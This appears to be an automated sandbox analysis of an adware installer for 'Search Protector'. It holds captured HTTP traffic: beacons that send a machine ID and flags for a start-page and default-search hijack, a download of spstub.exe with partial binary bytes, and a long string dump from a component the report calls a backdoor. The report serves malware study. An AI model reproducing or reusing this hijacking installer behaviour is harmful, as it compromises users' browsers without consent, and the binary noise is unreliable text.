HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:19:22 GMT

Content-Type: text/html

Content-Length: 6810

Connection: close

Content-Disposition: attachment; filename="1.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".5.7.1.
c.7.5.6.e.-.6.5.6.d.-.4.9.b.c.-.9.7.e.6.-.a.0.b.5.3.6.b.2.c.4.a.3."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".1._.e.x.e."...I.n.s.t.a.l.l.e.
r.I.D.=.".9.3.2.4.4.7.4.0.4."...L.o.c.a.l.e.=.".<.L.a.n.g.u.a.g.e.&
gt;."...D.a.t.e.=.".2.0.1.4./.0.8./.0.2."...T.i.m.e.=.".7.:.1.9.:.2.2.
"...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.n.s.=.".0.".
..R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.r.t.e.d.=.".
"...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.d.R.e.p.o.r.
t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.S.e.r.v.e.r.
]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.I.n.f.o.]...
C.o.u.n.t.r.y.C.o.d.e.=.".U.S."...I.P.A.d.d.r.e.s.s.=.".1.8.4...1.0.7.
..3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.d.G.e.n.]...P.e.
r.c.e.n.t.a.g.e.=.".6.3.".....[.S.c.r.e.e.n.7.6.]...T.i.t.l.e.=.".S.e.
t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.t.t.o.n.2.=.".C.
a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:. .t.h.e. .d.o.w.
n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.e.n... .P.l.e.a.
s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.a.g.e. .f.o.r. .
f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.e.n.7.5.]...T.i.
t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.".
N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.e.l.e.c.<<< skipped >>>

GET /get/?data=0BIqmZDY2uCNUO3ZTV47GddPvdyzkDVy+7LVMeiWPYiBnCaj7k5VmXKWI1PAmmSZgMSm0PBWd+AnT1E+ZQB16S/DiF+4fQvCbJ4VtAbtEkcTRdGLtOnGtxlnAjTmF29P02pymuZ0juTFPgy+HLQK909FbEdw4mVH+2P0HYsvyvhUPv375adfwI9Jyas2SEptJZhWja+RPXUMh0JkfAV4d311MD3ax3iE83oTL5ZzvJIdGyqIVbcsAi9qZyFbes0e/tD4t4SKs6wr2H8DmWcO67q38oNx+Sjmb80MxaLStTzP1sNUuKGHBdH9rZgNB/p3YWcakrG4mxDarwAZZ7JqQr4iPemyDeSdNKOq9UylOMsaP3dc7dVWAfI8hWCSqeWPOYtijjdt4KTWGFQP3jLhEKYt6QCilzBXEsdQbQMSoK1j0a0U2CN8xbl5wn1OzIZjkg4hgbatgSr13yPyusR/RI7SKQ50xtOKstDtw/AOpESdJvqcHU60CYuxZTVN&version=4 HTTP/1.1

Accept: */*

User-Agent: win32

Host: datadownloadscan.info

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 02 Aug 2014 07:21:34 GMT

Content-Length: 0

Connection: close

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 429

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"MiniStub_Init", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3309297", "machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG", "installer_version":"1.1.2.4", "origin":""}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:19:29 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 469

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"MiniStub_Complete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3309297", "machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG", "installer_version":"1.1.2.4", "origin":"", "result":"success", "reason": "0" }
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:20:03 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

GET /stub/spstub.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-storage.spccinta.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Last-Modified: Sat, 02 Aug 2014 10:01:12 GMT

Accept-Ranges: bytes

ETag: "8089503af264c1568a46208aea546eff"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 175208

Date: Sat, 02 Aug 2014 07:19:29 GMT

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#yd.B.7.B.7
.B.7..z7.B.7..l7.B.7.B.7.B.7.:.7.B.7...7.B.7.:.7.B.7Rich.B.7..........
..............PE..L....q.N.................d.......B..K5............@.
.........................0!...........................................
........... !.0.......................................................
.....................................................text....c.......d
.................. ..`.rdata...............h..............@[email protected]...
[email protected]................................
...rsrc...0.... !.....................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
...G..H.P.u..u..u...|[email protected][email protected].....@
..}[email protected]... M..........M........E...FQ.....NU..M
.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected][email protected][email protected] [email protected]..
...@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S..
...t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

CltMngSvc.exe_1784:

.text

`.rdata

@.data

.rsrc

@.reloc

.EKSWU

\$$;\$0|

DlSHA512 block transform for x86, CRYPTOGAMS by

Camellia for x86 by

AES for Intel AES-NI, CRYPTOGAMS by

6-9'6-9'

$6.:$6.:

*?#1*?#1

>8$4,8$4,

AES for x86, CRYPTOGAMS by

RC4 for x86, CRYPTOGAMS by

Montgomery Multiplication for x86, CRYPTOGAMS by

SHA1 block transform for x86, CRYPTOGAMS by

SHA256 block transform for x86, CRYPTOGAMS by

GHASH for x86, CRYPTOGAMS by

GF(2^m) Multiplication for x86, CRYPTOGAMS by

FtPS

[email protected]

t.JuG

PSSSSSSh

t.VVW

<1%u5

FTPj

tCPQ

,4,56,789

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

0123456789-

%b %d %H : %M : %S %Y

%m / %d / %y

%I : %M : %S %p

%d / %m / %y

boost thread: trying joining itself

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

Visual C   CRT: Not enough memory to complete call to strerror.

Operation not permitted

Inappropriate I/O control operation

Broken pipe

operator

GetProcessWindowStation

kernel32.dll

left-curly-bracket

right-curly-bracket

RSA part of OpenSSL 1.0.1e 11 Feb 2013

SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013

ssl_sess_cert

ssl_cert

evp_pkey

x509_pkey

%s(%d): OpenSSL internal error, assertion failed: %s

passed a null parameter

DSO support routines

x509 certificate routines

?456789:;<=

!"#$%&'()* ,-./0123

Big Number part of OpenSSL 1.0.1e 11 Feb 2013

pubkey

PEM part of OpenSSL 1.0.1e 11 Feb 2013

enc_key

key_enc_algor

cert

d.encrypted

d.digest

d.signed_and_enveloped

d.enveloped

d.sign

d.data

d.other

NETSCAPE_CERT_SEQUENCE

certs

X509_PUBKEY

public_key

.\crypto\asn1\x_pubkey.c

DSA part of OpenSSL 1.0.1e 11 Feb 2013

priv_key

pub_key

.\crypto\ec\ec_key.c

EC_PRIVATEKEY

publicKey

privateKey

value.implicitlyCA

value.parameters

value.named_curve

p.char_two

p.prime

p.ppBasis

p.tpBasis

p.onBasis

p.other

Any Extended Key Usage

anyExtendedKeyUsage

supportedAlgorithms

crossCertificatePair

certificateRevocationList

cACertificate

userCertificate

userPassword

supportedApplicationContext

Microsoft Local Key set

LocalKeySet

id-Gost28147-89-None-KeyMeshing

id-Gost28147-89-CryptoPro-KeyMeshing

password based MAC

id-PasswordBasedMAC

X509v3 Certificate Issuer

certificateIssuer

certicom-arc

Proxy Certificate Information

proxyCertInfo

Microsoft Smartcardlogin

msSmartcardLogin

joint-iso-itu-t

JOINT-ISO-ITU-T

set-rootKeyThumb

setAttr-Cert

setCext-cCertRequired

setCext-certType

setct-CertResTBE

setct-CertReqTBEX

setct-CertReqTBE

setct-AcqCardCodeMsgTBE

setct-CertInqReqTBS

setct-CertResData

setct-CertReqTBS

setct-CertReqData

setct-PCertResTBS

setct-PCertReqData

setct-AcqCardCodeMsg

certificate extensions

set-certExt

set-msgExt

id-ecPublicKey

id-cmc-confirmCertAcceptance

id-cmc-getCert

id-regInfo-certReq

id-regCtrl-protocolEncrKey

id-regCtrl-oldCertID

id-it-revPassphrase

id-it-keyPairParamRep

id-it-keyPairParamReq

id-it-unsupportedOIDs

id-it-caKeyUpdateInfo

id-it-encKeyPairTypes

id-it-signKeyPairTypes

id-it-caProtEncCert

id-mod-attribute-cert

id-mod-qualified-cert-93

id-mod-qualified-cert-88

id-smime-aa-ets-certCRLTimestamp

id-smime-aa-ets-certValues

id-smime-aa-ets-CertificateRefs

id-smime-aa-ets-otherSigCert

id-smime-aa-smimeEncryptCerts

id-smime-aa-signingCertificate

id-smime-aa-encrypKeyPref

id-smime-aa-msgSigDigest

id-smime-ct-publishCert

id-smime-mod-msg-v3

sdsiCertificate

x509Certificate

localKeyID

certBag

pkcs8ShroudedKeyBag

keyBag

pbeWithSHA1And2-KeyTripleDES-CBC

pbeWithSHA1And3-KeyTripleDES-CBC

TLS Web Client Authentication

TLS Web Server Authentication

X509v3 Extended Key Usage

extendedKeyUsage

X509v3 Authority Key Identifier

authorityKeyIdentifier

X509v3 Certificate Policies

certificatePolicies

X509v3 Private Key Usage Period

privateKeyUsagePeriod

X509v3 Key Usage

keyUsage

X509v3 Subject Key Identifier

subjectKeyIdentifier

Netscape Certificate Sequence

nsCertSequence

Netscape CA Policy Url

nsCaPolicyUrl

Netscape Renewal Url

nsRenewalUrl

Netscape CA Revocation Url

nsCaRevocationUrl

Netscape Revocation Url

nsRevocationUrl

Netscape Base Url

nsBaseUrl

Netscape Cert Type

nsCertType

Netscape Certificate Extension

nsCertExt

extendedCertificateAttributes

challengePassword

dhKeyAgreement

%'%1%=%C%K%O%s%

.%.-.3.7.9.?.W.[.o.y.

C%C'C3C7C9COCWCiC

RAND part of OpenSSL 1.0.1e 11 Feb 2013

You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html

lhash part of OpenSSL 1.0.1e 11 Feb 2013

Stack part of OpenSSL 1.0.1e 11 Feb 2013

Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013

value.single

value.set

EVP part of OpenSSL 1.0.1e 11 Feb 2013

name.relativename

name.fullname

certificateHold

Certificate Hold

cessationOfOperation

Cessation Of Operation

keyCompromise

Key Compromise

%*s%s:

%*sOnly Attribute Certificates

%*sOnly CA Certificates

%*sOnly User Certificates

ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013

d.registeredID

d.iPAddress

d.uniformResourceIdentifier

d.ediPartyName

d.directoryName

d.dNSName

d.rfc822Name

d.otherName

AUTHORITY_KEYID

keyid

cert_info

PKCS8_PRIV_KEY_INFO

pkey

pkeyalg

EC part of OpenSSL 1.0.1e 11 Feb 2013

USER32.DLL

NETAPI32.DLL

KERNEL32.DLL

ADVAPI32.DLL

.\crypto\dh\dh_key.c

%s: (%d bit)

Public-Key

Private-Key

recommended-private-length: %d bits

public-key:

private-key:

PKCS#3 DH Public-Key

PKCS#3 DH Private-Key

Public-Key: (%d bit)

Private-Key: (%d bit)

SHA1 part of OpenSSL 1.0.1e 11 Feb 2013

SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013

RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013

SHA part of OpenSSL 1.0.1e 11 Feb 2013

MD5 part of OpenSSL 1.0.1e 11 Feb 2013

MD4 part of OpenSSL 1.0.1e 11 Feb 2013

AES part of OpenSSL 1.0.1e 11 Feb 2013

CAST part of OpenSSL 1.0.1e 11 Feb 2013

Blowfish part of OpenSSL 1.0.1e 11 Feb 2013

:RC2 part of OpenSSL 1.0.1e 11 Feb 2013

.pp@0

aEÐ

 (#EÚ

ÚE<<0

IDEA part of OpenSSL 1.0.1e 11 Feb 2013

libdes part of OpenSSL 1.0.1e 11 Feb 2013

DES part of OpenSSL 1.0.1e 11 Feb 2013

\X

ddddddZ

ddddddZ

%d.%d.%d.%d

IP Address:%d.%d.%d.%d

URI:%s

DNS:%s

email:%s

EdiPartyName:

X400Name:

othername:

%d.%d.%d.%d/%d.%d.%d.%d

X509_CERT_PAIR

X509_CERT_AUX

X.509 part of OpenSSL 1.0.1e 11 Feb 2013

x%s

%s - d:d:d%.*s %d%s

keylen <= sizeof key

EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)

ECDSA part of OpenSSL 1.0.1e 11 Feb 2013

Basis Type: %s

Field Type: %s

ASN1 OID: %s

%s %s%lu (%s0x%lx)

'() ,-./:=?

Verifying - %s

%*sPolicy Text: %s

%*scrlUrl:

EXTENDED_KEY_USAGE

%*sZone: %s, User:

.\crypto\x509v3\v3_akey.c

d.usernotice

d.cpsuri

CERTIFICATEPOLICIES

%*sExplicit Text: %s

%*sNumber%s:

%*sOrganization: %s

%*sCPS: %s

PKEY_USAGE_PERIOD

keyCertSign

Certificate Sign

keyAgreement

Key Agreement

keyEncipherment

Key Encipherment

.\crypto\x509v3\v3_skey.c

CONF part of OpenSSL 1.0.1e 11 Feb 2013

PROXY_CERT_INFO_EXTENSION

hexkey

rsa_keygen_pubexp

rsa_keygen_bits

keylength

keyfunc

len>=0 && len<=(int)sizeof(ctx->key)

j <= (int)sizeof(ctx->key)

.\crypto\pkcs12\p12_key.c

d.receiptList

d.allOrFirstTier

d.compressedData

d.authenticatedData

d.encryptedData

d.digestedData

d.envelopedData

d.signedData

d.ori

d.pwri

d.kekri

d.kari

d.ktri

CMS_PasswordRecipientInfo

keyDerivationAlgorithm

keyIdentifier

CMS_KeyAgreeRecipientInfo

recipientEncryptedKeys

CMS_OriginatorIdentifierOrKey

d.originatorKey

CMS_OriginatorPublicKey

CMS_RecipientEncryptedKey

CMS_KeyAgreeRecipientIdentifier

d.rKeyId

CMS_RecipientKeyIdentifier

CMS_OtherKeyAttribute

keyAttr

keyAttrId

CMS_KeyTransRecipientInfo

encryptedKey

keyEncryptionAlgorithm

certificates

d.crl

d.subjectKeyIdentifier

d.issuerAndSerialNumber

CMS_CertificateChoices

d.v2AttrCert

d.v1AttrCert

d.extendedCertificate

d.certificate

CMS_OtherCertificateFormat

otherCert

otherCertFormat

crlUrl

certStatus

certId

OCSP_CERTSTATUS

value.unknown

value.revoked

value.good

value.byKey

value.byName

reqCert

OCSP_CERTID

issuerKeyHash

CONF_def part of OpenSSL 1.0.1e 11 Feb 2013

[[%s]]

[%s] %s=%s

ECDH part of OpenSSL 1.0.1e 11 Feb 2013

value.bag

value.safes

value.shkeybag

value.keybag

value.sdsicert

value.x509cert

value.other

%s.dll

@7@!@)@4@

@4@!@ @%@/@6@%@2@

@%@6@%@.@4@

A%@%C%D%P%I%Q%v%@%D%W%F%M%

S6S%S6S!S'S6S7S

8U4U-UuU4U!U!U0U8U%U!U&UuU'U0U4U6U=U0U1U

(\=\7\9\3\*\9\.\

C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp

{{{$1044}}}

{{{$1047}}}

{{{$1048}}}

{{{$626}}}

{{{$1049}}}

[>[)[-[2[8[>[{[

]8]/] ]4]>]8]}]

S6S!S%S6S!S

{{{$1055}}}

{{{$1058}}}

{{{$1057}}}

{{{$1060}}}

{{{$1059}}}

{{{$1062}}}

{{{$1061}}}

{{{$1064}}}

{{{$1063}}}

{{{$1066}}}

{{{$1065}}}

{{{$1068}}}

{{{$1067}}}

{{{$1070}}}

{{{$1069}}}

{{{$1072}}}

{{{$1071}}}

{{{$1073}}}

{{{$1101}}}

{{{$1102}}}

{{{$1104}}}

{{{$1103}}}

{{{$1106}}}

{{{$1105}}}

{{{$1108}}}

{{{$1107}}}

{{{$1109}}}

{{{$1111}}}

{{{$1110}}}

{{{$1113}}}

{{{$1112}}}

{{{$1116}}}

{{{$1117}}}

{{{$1114}}}

{{{$1115}}}

{{{$1123}}}

{{{$1122}}}

{{{$1125}}}

{{{$1124}}}

{{{$1126}}}

{{{$1127}}}

{{{$1129}}}

{{{$1128}}}

{{{$1130}}}

{{{$1131}}}

{{{$1132}}}

{{{$139}}}

{{{$138}}}

{{{$141}}}

{{{$140}}}

{{{$142}}}

{{{$144}}}

{{{$143}}}

{{{$146}}}

{{{$145}}}

{{{$124}}}

{{{$127}}}

{{{$128}}}

{{{$125}}}

{{{$126}}}

{{{$131}}}

{{{$132}}}

{{{$129}}}

{{{$130}}}

{{{$133}}}

{{{$134}}}

{{{$135}}}

J%V%I%J%F%D%I%@%

{{{$471}}}

{{{$473}}}

{{{$468}}}

{{{$461}}}

c%W%J%H%l%K%V%Q%D%I%I%

D%D/D!D D2D!D6D

DÐD%D

_6_<_-_0_,_0_9_ _

_6_1_;_0_(_,_

_*_-_-_:_1_ _

_:_-_,_6_0_1_

_2_>_8_:_

_'_:_<_*_ _6_0_1_

_/_ _6_0_1_,_

I,I$I9I,I;I I'I.IiIdIiI

{{{$483}}}

{{{$484}}}

{{{$486}}}

{{{$487}}}

{{{$485}}}

{{{$488}}}

{{{$489}}}

{{{$494}}}

{{{$495}}}

{{{$498}}}

{{{$496}}}

{{{$497}}}

{{{$499}}}

{{{$501}}}

{{{$502}}}

{{{$500}}}

{{{$503}}}

{{{$504}}}

{{{$505}}}

{{{$508}}}

{{{$506}}}

{{{$507}}}

{{{$509}}}

{{{$510}}}

{{{$511}}}

{{{$512}}}

{{{$513}}}

{{{$514}}}

{{{$515}}}

{{{$518}}}

{{{$519}}}

{{{$516}}}

{{{$517}}}

{{{$520}}}

{{{$521}}}

{{{$523}}}

{{{$522}}}

4|7|?|?|

{{{$609}}}

{{{$610}}}

{{{$613}}}

{{{$614}}}

{{{$611}}}

{{{$612}}}

_3_0_=_>_3_

_(_6_1_;_0_(_,_

_8_3_0_=_>_3_

_<_0_*_1_ _:_-_,_

S6S!S>S S.SuS

cCc%c

{{{$404}}}

{{{$402}}}

{{{$403}}}

{{{$405}}}

Z.Z#Z*Z?ZgZ}Z.Z?Z"Z.ZuZ2Z.Z7Z6Z}Z

{{{$406}}}

[([>[:[)[8[3[

[>[)[6[&[

{{{$408}}}

{{{$409}}}

{{{$410}}}

F5F#F'F4F%F.F6F*F3F!F/F(F5F

B0B.BbB6B;B2B'B

PUADQ@%%h`qdv%V@Q%vu`flclfv8:4)%v`ws`wZvu`flclfv8:7%RM@W@%kjkZpkltp`Zkdh`%iln`%"mjh`udb`ZlvZk`rqdgudb`"%DKA%v`ws`wZkjkZpkltp`Zkdh`%%iln`%"mjh`udb`ZlvZk`rqdgudb`"

{{{$312}}}

{{{$313}}}

{{{$314}}}

{{{$334}}}

a!-dc}xyRhcnbidcj~!-~xjjh~yRx

U&U!U4U'U!U U%U

{{{$357}}}

{{{$358}}}

{{{$359}}}

{{{$360}}}

CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);

insert into ItemTable (key, value) VALUES ('%s', '%s');

1d'd)d;d7d!dÖd'd,d;d0d!d6d)d

\/\/\9\(\

{{{$629}}}

{{{$632}}}

{{{$631}}}

{{{$630}}}

C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h

(more frames truncated from call stack report)

\StringFileInfo\xx\%s

Module %d

%d/%d/%d d:d:d

File Size: %-10d File Time: %s

Checksum: 0xx Time Stamp: 0xx

Image Base: 0xx Image Size: 0xx

FileVer: %d.%d.%d.%d

FileDesc: %s

Product: %s

Company: %s

ProdVer: %d.%d.%d.%d

Windows 7

Windows Server 2008

Windows Vista

Windows 9

Windows Server 2012

Windows 8

Windows Server 2008 R2

Web Edition

Windows XP

Windows Server 9

Windows 2000

(build %d)

Error occurred at %s.

This sample does not support this version of Windows.

%d%% memory in use.

%d processor(s), type %d.

Operating system: Could not Determine

Operating system: %s

%d MBytes paging file free.

%d MBytes paging file.

%d MBytes physical memory free.

%d MBytes user address space free.

Windows Home Server

Windows Storage Server 2003

Windows Server 2003 R2

Web Server Edition

Windows Server 2003

Windows XP Professional x64 Edition

a Float Denormal Operand

%d MBytes user address space.

a Float Invalid Operation

%d MBytes physical memory.

0xx:

EBX: 0xx ECX: 0xx EDX: 0xx

EDI: 0xx ESI: 0xx EAX: 0xx

%s\CRASH_REPORT_%s.txt

EFlags: 0xx ESP: 0xx SegSs: 0xx

EIP: 0xx EBP: 0xx SegCs: 0xx

%s caused %s (0xx)

in module %s at x:x.

%s location x caused an access violation.

Exception code is 0xX

Crash dump file: %s

Crash report file :%s

%s\CRASH_DUMP_%s.dmp

===== [end of %s] =====

Error creating dump file, err=%d

P%d_T%d_Dld_ld_ld_Tld_ld_ld

code: %x

code: %x, addr: %x, module: %s

00:00:00.

NtQueryKey

{{{$615}}}

{{{$618}}}

{{{$617}}}

{{{$616}}}

{{{$624}}}

{{{$623}}}

{{{$691}}}

{{{$690}}}

{{{$693}}}

{{{$692}}}

%s 0x%I64x %s [file:%s(%u)]

ftp://

https://

http://

wininet.dll

[%u, 0xx] %s

https

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

request HttpSendRequestA failed...

Content-Length: %u

response failed...last error %d

1.1.3

gen_codes: max_code %d

code %d bits %d->%d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

{{{$717}}}

{{{$718}}}

{{{$719}}}

{{{$720}}}

{{{$723}}}

{{{$722}}}

{{{$721}}}

{{{$724}}}

{{{$725}}}

{{{$728}}}

{{{$727}}}

{{{$726}}}

{{{$729}}}

{{{$730}}}

{{{$731}}}

{{{$733}}}

{{{$732}}}

{{{$735}}}

{{{$734}}}

{{{$744}}}

{{{$743}}}

{{{$742}}}

{{{$747}}}

{{{$746}}}

%{{{$667}}}

{{{$669}}}

{{{$668}}}

SQLite format 3

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

CREATE TABLE sqlite_master(

sql text

3.7.16

CREATE TEMP TABLE sqlite_temp_master(

{{{$101}}}

{{{$103}}}

{{{$102}}}

{{{$108}}}

{{{$107}}}

{{{$110}}}

{{{$109}}}

{{{$104}}}

{{{$106}}}

{{{$105}}}

{{{$112}}}

{{{$111}}}

{{{$113}}}

{{{$114}}}

{{{$118}}}

{{{$119}}}

{{{$115}}}

{{{$117}}}

{{{$116}}}

{{{$121}}}

{{{$123}}}

{{{$122}}}

{{{$120}}}

{{{$100}}}

{{{$685}}}

{{{$684}}}

{{{$687}}}

{{{$686}}}

{{{$681}}}

{{{$683}}}

{{{$682}}}

{{{$688}}}

%A%@%S%Q%W%J%S%L%B%J%

%F%J%H%

*F'F$FhF5F#F'F4F%F.FhF%F)F(F"F3F/F2FhF%F)F F

boost::too_few_args: format-string referred to more arguments than were passed

boost::too_many_args: format-string referred to less arguments than were passed

{{{$137}}}

Content-Disposition: form-data; name="%s"; filename="%s"

Content-Disposition: form-data; name="%s"

_0_9_ _(_>_-_:_

_:_>_-_<_7_

_-_0_ _:_<_ _

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

API call with %s database connection pointer

922337203685477580

RowKey

OsError 0x%x (%u)

os_win.c:%d: (%d) %s(%s) - %s

GetProcessHeap

delayed %dms for lock/sharing conflict

%s-shm

%s\etilqs_

%s\%s

Recovered %d frames from WAL file %s

cannot limit WAL size: %s

invalid page number %d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

2nd reference to page %d

Failed to read ptrmap key=%d

Page %d:

unable to get the page. error code=%d

failed to get page %d

freelist leaf count too big on page %d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Corruption detected in cell %d on page %d

Page %d is never used

Pointer map page %d is referenced

unknown database %s

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

MJ delete: %s

MJ collide: %s

%s-mjXXXXXX9XXz

-mjX9X

foreign key constraint failed

bind on a busy prepared statement: [%s]

unable to use function %s in the requested context

zeroblob(%d)

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

abort at %d in [%s]: %s

cannot commit transaction - SQL statements in progress

no such savepoint: %s

cannot release savepoint - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

database table is locked: %s

statement aborts at %d: [%s] %s

cannot change %s wal mode from within a transaction

cannot open value of type %s

cannot open view: %s

no such column: "%s"

cannot open virtual table: %s

cannot open %s column for writing

foreign key

indexed

misuse of aliased aggregate %s

%s: %s

not authorized to use function: %s

%s: %s.%s.%s

%s: %s.%s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

variable number must be between ?1 and ?%d

too many SQL variables

Expression tree is too large (maximum depth %d)

too many columns in %s

EXECUTE %s%s SUBQUERY %d

%.*s"%w"%s

misuse of aggregate: %s()

sqlite_rename_trigger

sqlite_rename_parent

%s%.*s"%w"

sqlite_rename_table

type='trigger' AND (%s)

%s OR name=%Q

there is already another table or index with this name: %s

view %s may not be altered

sqlite_

table %s may not be altered

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_stat1

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE %s=%Q

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

database %s is already in use

invalid name: "%s"

